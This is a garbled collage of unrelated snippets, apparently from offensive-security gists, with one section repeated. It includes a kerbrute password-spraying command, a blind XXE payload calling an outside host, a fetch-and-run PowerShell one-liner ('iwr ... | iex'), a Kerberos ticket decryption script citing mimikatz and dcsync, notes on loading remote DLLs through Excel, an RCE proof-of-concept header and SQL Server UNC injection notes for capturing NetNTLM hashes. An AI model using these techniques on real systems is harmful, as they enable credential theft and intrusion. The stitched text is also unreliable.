With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
000000 Officially Xerox | |
000001 SuperLAN-2U | |
000002 BBN (was internal usage only, no longer used) | |
000003 XEROX CORPORATION | |
000004 XEROX CORPORATION | |
000005 XEROX CORPORATION | |
000006 XEROX CORPORATION | |
000007 XEROX CORPORATION | |
000008 XEROX CORPORATION | |
000009 powerpipes? |
### | |
### | |
### UPDATE: For Win 11, I recommend using this tool in place of this script: | |
### https://christitus.com/windows-tool/ | |
### https://github.com/ChrisTitusTech/winutil | |
### https://www.youtube.com/watch?v=6UQZ5oQg8XA | |
### iwr -useb https://christitus.com/win | iex | |
### | |
### |
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
#!/usr/bin/env python2 | |
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets. | |
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets. | |
# | |
# Recommended Instructions: | |
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export" | |
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>" | |
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket) | |
# Run this script to decrypt: | |
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./Administrator@TESTLAB.LOCAL_krbtgt~TESTLAB.LOCAL@TESTLAB.LOCAL.ccaches |
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\
.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
#!/usr/bin/env python | |
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
# this is a rough PoC | |
# requirements for RCE: | |
# - the attacker needs to either have or create an object with a service principal name | |
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account | |
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts) | |
# - NTLM has to be in use |
This is a list of SQL Server commands that support UNC path [injections] by default. | |
The injections can be used to capture or replay the NetNTLM password hash of the | |
Windows account used to run the SQL Server service. The SQL Server service account | |
has sysadmin privileges by default in all versions of SQL Server. | |
Note: This list is most likely not complete. | |
----------------------------------------------------------------------- | |
-- UNC Path Injections Executable by the Public Fixed Server Role | |
----------------------------------------------------------------------- |